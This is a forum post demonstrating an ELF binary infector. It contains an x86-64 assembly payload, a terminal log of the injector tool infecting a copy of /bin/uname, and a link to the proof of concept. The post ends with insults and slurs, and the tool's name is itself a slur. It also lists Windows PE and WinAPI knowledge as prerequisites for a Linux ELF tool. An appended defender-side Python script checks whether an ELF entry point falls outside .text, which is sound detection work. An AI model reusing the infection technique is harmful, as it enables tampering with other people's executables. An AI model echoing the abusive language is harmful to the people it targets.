mesvak

This is so simple; you just need to know:

- stuff in C/C++
- stuff in Intel x86 assembly
- the WinAPI and its documentation
- the PE file structure
- Dynamic Linked Libraries

PoC .c, written in C++: https://pastr.io/view/sbYDYI

and the assembly code:

[code]
section .text
global _start
_start:
    sub  r12, 0x4f20          ; 0x4f20 is the offset the injector reports ("offset == 0x4f20"); r12 is expected to hold the address the payload returns to
    push rax                  ; save the registers the payload touches
    push rdi
    push rsi
    push rdx
    mov  rax, 1               ; [1] - sys_write
    mov  rdi, 1               ; 0 = stdin / 1 = stdout / 2 = stderr
    lea  rsi, [rel msg]       ; pointer (mem address) to msg (*char[])
    mov  rdx, msg_end - msg   ; msg size
    syscall                   ; calls the function stored in rax (note: syscall also clobbers rcx and r11, which are not saved here)
    pop  rdx
    pop  rsi
    pop  rdi
    pop  rax
    jmp  r12                  ; hand control back to the original code
    align 8
msg     db 'Infected file Test', 0x0a, 0
msg_end db 0x0
[/code]

and usage, written by shitty hands:

[code]
$ cp /bin/uname evil_uname
$ ./niga evil_uname
ELF virus example
Running in offset mode
+ Mapped file (35032 bytes) at 0x7fff7ae5a540
+ Processing Victim -> Entry point value: 0x1f60
+ Processing Victim -> Found .text segment executable (# 2)
* Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
offset == 0x4f20
$ # change offset on shellcode.asm
$ nasm -f elf64 shellcode.asm
$ ./niga evil_uname shellcode.o
ELF virus example
+ Mapped file (35032 bytes) at 0x7ffc51d5d920
+ Processing Victim -> Entry point value: 0x1f60
+ Processing Victim -> Found .text segment executable (# 2)
* Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
+ Processing victim -> Base Address: 0x (nil)
+ Mapped file (704 bytes) in 0x7ffc51d5d928
+ Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section
+ Processing payload -> sname: ''
+ Processing payload -> sname: '.text'
has entered the returning if
shdr->sh_name: 1
shdr->sh_type: 1
shdr->sh_addr: 0
+ Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes)
$ ./evil_uname
Infected file Test
Linux
[/code]

me no gae u are all retarded plebs Xd
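As an added, defender-side example (not code from mesvak's post or tool): a Python check for the sign an infector of this kind leaves behind, assuming, as the entry-point and LOAD-segment padding messages in the transcript suggest, that e_entry ends up pointing at code placed past the end of .text. The ELF64 image it runs on is constructed inline; `check_entry_point` and `build_sample_elf` are names of my own.

```python
import struct

EHDR = '<16sHHIQQQIHHHHHH'   # Elf64_Ehdr, little-endian
PHDR = '<IIQQQQQQ'           # Elf64_Phdr
SHDR = '<IIQQQQIIQQ'         # Elf64_Shdr

def check_entry_point(data: bytes) -> list:
    """Return findings about where e_entry points; an empty list means it looks sane."""
    if data[:4] != b'\x7fELF' or data[4] != 2:          # ELFCLASS64 only
        raise ValueError('not an ELF64 image')
    hdr = struct.unpack_from(EHDR, data, 0)
    e_entry, e_phoff, e_shoff = hdr[4], hdr[5], hdr[6]
    e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = hdr[9:14]
    phdrs = [struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize) for i in range(e_phnum)]
    shdrs = [struct.unpack_from(SHDR, data, e_shoff + i * e_shentsize) for i in range(e_shnum)]
    strtab = shdrs[e_shstrndx][4]                        # sh_offset of .shstrtab
    def sec_name(sh):
        start = strtab + sh[0]
        return data[start:data.index(b'\0', start)].decode()
    findings = []
    # 1. the entry point must sit inside an executable PT_LOAD (p_type 1, PF_X bit set)
    if not any(p[0] == 1 and p[1] & 1 and p[3] <= e_entry < p[3] + p[5] for p in phdrs):
        findings.append(f'entry 0x{e_entry:x} is not inside an executable PT_LOAD')
    # 2. ...and inside .text itself: code living in the segment padding after .text,
    #    still mapped executable, is exactly what a padding infection leaves behind
    text = next((s for s in shdrs if sec_name(s) == '.text'), None)
    if text is None:
        findings.append('no .text section header')
    elif not (text[3] <= e_entry < text[3] + text[5]):
        lo, hi = text[3], text[3] + text[5]
        findings.append(f'entry 0x{e_entry:x} outside .text [0x{lo:x}, 0x{hi:x})')
    return findings

def build_sample_elf(entry: int) -> bytes:
    """Constructed ELF64 image for testing (not a real program): one R+X PT_LOAD
    covering the file, a 0x40-byte .text at offset 0x80, padding, then .shstrtab."""
    base, text_off, text_size, load_size = 0x400000, 0x80, 0x40, 0x100
    names, str_off, sh_off = b'\0.text\0.shstrtab\0', 0x100, 0x120
    img = bytearray(sh_off + 3 * 64)
    img[0:64] = struct.pack(EHDR, b'\x7fELF\x02\x01\x01' + b'\0' * 9, 2, 62, 1, entry,
                            64, sh_off, 0, 64, 56, 1, 64, 3, 2)
    img[64:120] = struct.pack(PHDR, 1, 5, 0, base, base, load_size, load_size, 0x1000)
    img[text_off:text_off + text_size] = b'\xc3' * text_size   # placeholder code bytes
    img[str_off:str_off + len(names)] = names
    img[sh_off:] = b''.join([
        struct.pack(SHDR, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),                                 # SHN_UNDEF
        struct.pack(SHDR, 1, 1, 6, base + text_off, text_off, text_size, 0, 0, 16, 0),  # .text
        struct.pack(SHDR, 7, 3, 0, 0, str_off, len(names), 0, 0, 1, 0)])                # .shstrtab
    return bytes(img)
```

The same `check_entry_point` runs unchanged over a real file via `open(path, 'rb').read()`; a stripped binary with no section headers will report the missing .text rather than silently passing.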